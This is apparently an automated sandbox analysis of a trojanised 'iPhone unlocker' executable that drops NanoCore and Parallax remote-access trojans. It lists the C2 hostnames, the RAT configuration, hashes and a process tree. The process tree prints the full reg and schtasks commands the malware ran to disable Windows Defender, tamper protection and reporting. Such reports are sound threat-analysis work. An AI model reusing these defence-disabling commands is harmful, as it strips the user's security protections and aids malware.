Analysis
- max time kernel: 138s
- max time network: 153s
- platform: windows7_x64
- resource: win7-20221111-en
- resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
- submitted: 16-01-2023 21:46

Static task: static1
Behavioral task: behavioral1
- Sample: F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
- Resource: win7-20221111-en
General
- Target: F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
- Size: 16.0MB
- MD5: 0f007d899ab6ef50e71a1acfd1ab4147
- SHA1: 6cbb099844201db58f34f41720b001f6e10d6197
- SHA256: f816ea850eca0a23b99541054eddc2ac01971bb502dcf1231dc02ed58282365f
- SHA512: a49c5898e060c0bf5e35608740c2317283e6f13d6f70bc62b1648689e7ba19e83d3c8b179aa1f37b0a57469edc75e30b1d0f93b4b065f361627a6e64065bc91c
- SSDEEP: 393216:T3HBq+lXKkz4XNC6JMxBEMYUUwE+hxRgNqw+VNdT0Qxq+I:jVdxwNC6JgBEIzD/gkfVPZVI
Malware Config
Extracted
- Family: nanocore
- Version: 1.2.2.0
- C2: allonsy.hopto.org:54999, grosjeangerard.hopto.org:54999
- Mutex: 4e2053ac-25a8-4992-bc5f-78bde39f716d

Attributes
- activate_away_mode: true
- backup_connection_host: grosjeangerard.hopto.org
- backup_dns_server: 8.8.4.4
- buffer_size: 65535
- build_time: 2020-01-18T20:19:32.705027836Z
- bypass_user_account_control: true
- bypass_user_account_control_data: (empty)
- clear_access_control: true
- clear_zone_identifier: false
- connect_delay: 4000
- connection_port: 54999
- default_group: NARATION
- enable_debug_mode: true
- gc_threshold: 1.048576e+07
- keep_alive_timeout: 30000
- keyboard_logging: false
- lan_timeout: 2500
- max_packet_size: 1.048576e+07
- mutex: 4e2053ac-25a8-4992-bc5f-78bde39f716d
- mutex_timeout: 5000
- prevent_system_sleep: false
- primary_connection_host: allonsy.hopto.org
- primary_dns_server: 8.8.8.8
- request_elevation: true
- restart_delay: 5000
- run_delay: 0
- run_on_startup: true
- set_critical_process: true
- timeout_interval: 5000
- use_custom_dns_server: false
- version: 1.2.2.0
- wan_timeout: 8000
Signatures

Modifies Windows Defender Real-time Protection settings
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" (reg.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" (reg.exe)
- Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)

Modifies security service (2 TTPs, 1 IoC)
- Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" (reg.exe)

ParallaxRat payload (7 IoCs)
Detects payload of Parallax Rat, a small portable Rat usually digitally signed with a Sectigo certificate.
- behavioral1/memory/668-127-0x0000000000400000-0x000000000042B000-memory.dmp (yara rule: parallax_rat)
- behavioral1/memory/668-128-0x0000000000400000-0x000000000042B000-memory.dmp (yara rule: parallax_rat)
- behavioral1/memory/668-131-0x0000000000400000-0x000000000042B000-memory.dmp (yara rule: parallax_rat)
- behavioral1/memory/668-132-0x0000000000400000-0x000000000042B000-memory.dmp (yara rule: parallax_rat)
- behavioral1/memory/668-133-0x000000000040A478-mapping.dmp (yara rule: parallax_rat)
- behavioral1/memory/668-126-0x0000000000400000-0x000000000042B000-memory.dmp (yara rule: parallax_rat)
- behavioral1/memory/668-144-0x0000000000400000-0x000000000042B000-memory.dmp (yara rule: parallax_rat)

Executes dropped EXE (9 IoCs)
- PID 892 PassFabiPhone.exe
- PID 1736 NanWin.exe
- PID 1716 ParaWin.exe
- PID 616 iphone-unlocker.exe
- PID 588 iphone-unlocker.tmp
- PID 1124 NanWin.exe
- PID 1148 NanWin.exe
- PID 1740 NanWin.exe
- PID 1864 NanWin.exe

Drops startup file (4 IoCs)
- File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe (ParaWin.exe)
- File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe (ParaWin.exe)
- File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe (NanWin.exe)
- File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe (NanWin.exe)

Loads dropped DLL (16 IoCs)
- PID 1320 F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe (15 entries)
- PID 616 iphone-unlocker.exe

Checks whether UAC is enabled
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (NanWin.exe)
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (NanWin.exe)

Suspicious use of SetThreadContext (3 IoCs)
- PID 1716 set thread context of 668 (ParaWin.exe; procid_target 58)
- PID 1736 set thread context of 1148 (NanWin.exe; procid_target 69)
- PID 1740 set thread context of 1864 (NanWin.exe; procid_target 71)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (38 IoCs)
- PID 1716 ParaWin.exe (9 entries)
- PID 1736 NanWin.exe (11 entries)
- PID 1148 NanWin.exe (3 entries)
- PID 1740 NanWin.exe (9 entries)
- PID 1864 NanWin.exe (6 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
- PID 1864 NanWin.exe

Suspicious behavior: SetClipboardViewer (1 IoCs)
- PID 1148 NanWin.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
- Token: SeDebugPrivilege, PID 1716 ParaWin.exe
- Token: SeDebugPrivilege, PID 1736 NanWin.exe
- Token: SeDebugPrivilege, PID 1148 NanWin.exe
- Token: SeDebugPrivilege, PID 1148 NanWin.exe
- Token: SeDebugPrivilege, PID 1740 NanWin.exe
- Token: SeDebugPrivilege, PID 1864 NanWin.exe

Suspicious use of WriteProcessMemory (64 IoCs)
- PID 1320 wrote to memory of 892 (F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe; procid_target 28) (4 entries)
- PID 1320 wrote to memory of 1736 (F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe; procid_target 30) (4 entries)
- PID 1320 wrote to memory of 1716 (F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe; procid_target 31) (7 entries)
- PID 892 wrote to memory of 536 (PassFabiPhone.exe; procid_target 34) (4 entries)
- PID 536 wrote to memory of 776 (cmd.exe; procid_target 32) (3 entries)
- PID 1320 wrote to memory of 616 (F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe; procid_target 33) (7 entries)
- PID 536 wrote to memory of 1648 (cmd.exe; procid_target 35) (3 entries)
- PID 616 wrote to memory of 588 (iphone-unlocker.exe; procid_target 36) (7 entries)
- PID 536 wrote to memory of 1708 (cmd.exe; procid_target 37) (3 entries)
- PID 536 wrote to memory of 1044 (cmd.exe; procid_target 38) (3 entries)
- PID 536 wrote to memory of 680 (cmd.exe; procid_target 39) (3 entries)
- PID 536 wrote to memory of 1100 (cmd.exe; procid_target 40) (3 entries)
- PID 536 wrote to memory of 1092 (cmd.exe; procid_target 41) (3 entries)
- PID 536 wrote to memory of 2008 (cmd.exe; procid_target 42) (3 entries)
- PID 536 wrote to memory of 916 (cmd.exe; procid_target 43) (3 entries)
- PID 536 wrote to memory of 1596 (cmd.exe; procid_target 44) (3 entries)
- PID 536 wrote to memory of 1048 (cmd.exe; procid_target 45) (1 entry)
Processes
- C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe (PID 1320)
  command line: "C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe"
  signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe (PID 892)
    command line: "C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"
    signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 536)
      command line: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1343.tmp\1344.tmp\1345.bat C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\reg.exe (PID 1648)
        command line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      - C:\Windows\system32\reg.exe (PID 1708)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe (PID 1044)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe (PID 680)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      - C:\Windows\system32\reg.exe (PID 1100)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        signatures: Modifies Windows Defender Real-time Protection settings
      - C:\Windows\system32\reg.exe (PID 1092)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        signatures: Modifies Windows Defender Real-time Protection settings
      - C:\Windows\system32\reg.exe (PID 2008)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        signatures: Modifies Windows Defender Real-time Protection settings
      - C:\Windows\system32\reg.exe (PID 916)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        signatures: Modifies Windows Defender Real-time Protection settings
      - C:\Windows\system32\reg.exe (PID 1596)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        signatures: Modifies Windows Defender Real-time Protection settings
      - C:\Windows\system32\reg.exe (PID 1048)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe (PID 1900)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      - C:\Windows\system32\reg.exe (PID 1732)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      - C:\Windows\system32\reg.exe (PID 968)
        command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      - C:\Windows\system32\reg.exe (PID 1944)
        command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      - C:\Windows\system32\reg.exe (PID 1084)
        command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      - C:\Windows\system32\schtasks.exe (PID 1324)
        command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      - C:\Windows\system32\schtasks.exe (PID 1568)
        command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      - C:\Windows\system32\schtasks.exe (PID 1276)
        command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      - C:\Windows\system32\schtasks.exe (PID 1588)
        command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      - C:\Windows\system32\schtasks.exe (PID 1728)
        command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      - C:\Windows\system32\reg.exe (PID 1016)
        command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      - C:\Windows\system32\reg.exe (PID 1836)
        command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      - C:\Windows\system32\reg.exe (PID 1372)
        command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      - C:\Windows\system32\reg.exe (PID 1476)
        command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      - C:\Windows\system32\reg.exe (PID 292)
        command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      - C:\Windows\system32\reg.exe (PID 1700)
        command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      - C:\Windows\system32\reg.exe (PID 912)
        command line: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      - C:\Windows\system32\reg.exe (PID 428)
        command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      - C:\Windows\system32\reg.exe (PID 1092)
        command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      - C:\Windows\system32\reg.exe (PID 1696)
        command line: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        signatures: Modifies security service
  - C:\Users\Admin\AppData\Roaming\NanWin.exe (PID 1736)
    command line: "C:\Users\Admin\AppData\Roaming\NanWin.exe"
    signatures: Executes dropped EXE; Drops startup file; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Roaming\NanWin.exe (PID 1124)
      command line: "C:\Users\Admin\AppData\Roaming\NanWin.exe"
      signatures: Executes dropped EXE
    - C:\Users\Admin\AppData\Roaming\NanWin.exe (PID 1148)
      command line: "C:\Users\Admin\AppData\Roaming\NanWin.exe"
      signatures: Executes dropped EXE; Checks whether UAC is enabled; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: SetClipboardViewer; Suspicious use of AdjustPrivilegeToken
      - C:\Users\Admin\AppData\Roaming\NanWin.exe (PID 1740)
        command line: "C:\Users\Admin\AppData\Roaming\NanWin.exe"
        signatures: Executes dropped EXE; Drops startup file; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Users\Admin\AppData\Roaming\NanWin.exe (PID 1864)
          command line: "C:\Users\Admin\AppData\Roaming\NanWin.exe"
          signatures: Executes dropped EXE; Checks whether UAC is enabled; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Roaming\ParaWin.exe (PID 1716)
    command line: "C:\Users\Admin\AppData\Roaming\ParaWin.exe"
    signatures: Executes dropped EXE; Drops startup file; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\svchost.exe (PID 668)
      command line: "C:\Windows\System32\svchost.exe"
  - C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe (PID 616)
    command line: "C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"
    signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\is-MFPSU.tmp\iphone-unlocker.tmp (PID 588)
      command line: "C:\Users\Admin\AppData\Local\Temp\is-MFPSU.tmp\iphone-unlocker.tmp" /SL5="$90122,15327349,546304,C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"
      signatures: Executes dropped EXE
- C:\Windows\system32\reg.exe (PID 776)
  command line: reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
Network
MITRE ATT&CK Enterprise v6
Downloads
34 entries in total; entries with identical hashes are listed once, in order of first appearance, with their count.

- Filesize: 4KB (1 entry)
  MD5: 35b74dad14475b9684b5afa31b75f3fa
  SHA1: 59c915df0361253e87d8e7fc24a7f45215949f44
  SHA256: 9d2bfa4eb93d0026edafa2f6fdc06faa591be4334f739adae413247a7019fe8b
  SHA512: 85383abab6052210425db6d6b139e504a786765dd7cb085991f8867c45932ab1a98bdfe77d737751c551b9c6c25de0d9fb5d9d41375deca43da327c306239590
- Filesize: 1.5MB (2 entries)
  MD5: 844384b7d563f094910e2b986ded3320
  SHA1: df9661693cb55116b653dba682aa9819bee59849
  SHA256: 6eec90877ed23e5c8136c5d774ab13db441ae51730450b2fc15ef3d1ed8e982f
  SHA512: a90a260c369158a8e55c460c60fe9ee92b8e36a8a839e7a0e6d5a17887e1166bd2b163a56fbbce330b0b3cd1209d711031d1303402e178837de5e4f230c62a4f
- Filesize: 216B (1 entry)
  MD5: f2f3e7fbcd24813c3e4987d9389c3f23
  SHA1: c9878bc25efc8a6dcbf499473825ab1f0d40275f
  SHA256: c13850de467f6c87883cddc56b0f7bb1424314e817e5679d8dbe8ff734c56d7e
  SHA512: cf3080d70d852e8683e935de28aa9b4cab920521f2a4174b7f025ea51b202998c55d958332b1d988bae4797a10f0ad5c5b194a3a02ec4f185f9f89baf1a3bfcc
- Filesize: 8B (1 entry)
  MD5: fae9e2521fda5a362c0031aba2d8c651
  SHA1: 11f2d7219d19e06f98413cdb65177ed5d74bd5d3
  SHA256: eca39e9d9adb1a3f77a5f1eea697b4307d54fb356d4a14c68588e756f5c607ee
  SHA512: 94ee3b4eb0885e326cee5108bf1b2a0106e1a506b79338162eb8ff621b05c9a941859d443248bbe8d67160bf4eb915fc925bdb3a9dc9ee18647c43df4e8dd9ff
- Filesize: 293KB (1 entry)
  MD5: 187462c6b61de77ca73e201101000759
  SHA1: a179615db6c0a2d1e9d9122bc8f9fe6cf3302280
  SHA256: de1fe9adcc339eec3316cb7d70bd63d695bcc017aacea188dd5eecc53b95a50a
  SHA512: b15641554bf613d1e292c36faca9daa22289f25a8feba5471dd1d75bc71282768e2008c360e209beabe6472f4d44a3dd208d2dc2bba2797a1fd7c4ab112f89a8
- Filesize: 412KB (11 entries)
  MD5: 610696767503d1e65a0f00892ae76748
  SHA1: f4c666cb6e6f85c702173eebfe0fedb74061f755
  SHA256: a98866f6635b8a49a1231cc1b547d469c4cdc321732e36aa2e230460ae8e74a1
  SHA512: 2fd50be5f2f096e08bd45b5969e6eb7140a1e83bee0743b247e1a3d870694d60d11ef61c2e03aca84cf1b2f6225fb40487365f0b1e9590eb74a79c6995ace1de
- Filesize: 412KB (1 entry)
  MD5: f128341e5efb8a7b4684f14ca94dddb9
  SHA1: b53b0998b127738a37296d641971b82bf5434658
  SHA256: 267cd1c9e1bf7396cf4dd89702849cb5e74e53693ebcf45c65b63d7490975b6b
  SHA512: 33a657c40ec921bc663cf4a06e50c1cbafa70a68af4e93a18718d76277f86258e09104b29afe62e5432e7a60f41e009ba7c66c3320dacf169fbe2c4d2959a814
- Filesize: 335KB (6 entries)
  MD5: 0335dc59409a50d9dd55bf2c103be4a3
  SHA1: 74a326b31f47b5acce81d057345379296efb3a8c
  SHA256: 829b0a54123b9105d688a6592ddf830f798f467c536c9f0833c7d4c0ae02d9a7
  SHA512: ebf2022a8c71d46249d2ff3a2f54712e623697bff5614e24d8d06551ed332cb43af2fc3dd06490b26d9f484e99bb4579e07fad8c3a7c19a9d101a06244e7ca59
- Filesize: 20.0MB (4 entries)
  MD5: 8c5dd78ab39b61f7d55b15bb283df424
  SHA1: cd695484bdb7fbce5cd223159fbdd36a336f4914
  SHA256: 5769ccef917fe78906c41ae332f08429401798483fa47a61fd8f90c77a2a3ce8
  SHA512: f9b063c91baf3548448ce2476337789d591e88d376a3c7530fd36006980a1a0fea23b6298d50e3264ff25507d337a54d8db4910a1754be2c7701f4f27a7cc423
- Filesize: 15.1MB (6 entries)
  MD5: 48c26c1d7339c99e2c0dbba5af874176
  SHA1: 547a9984003102d58dacc176621ce00d09e00728
  SHA256: 94ea3520cfba9ac746b552df843e682cf6d2b11627759a216bd83aa95714c782
  SHA512: d42d9bf7ca36268f3ee75234f61b36ed720fe25e3c0fe322531c3dace91d33b5f5b37ab7ba2cf76c46dfdb04341e8ae01961280e7ded14d92e9609197da8861e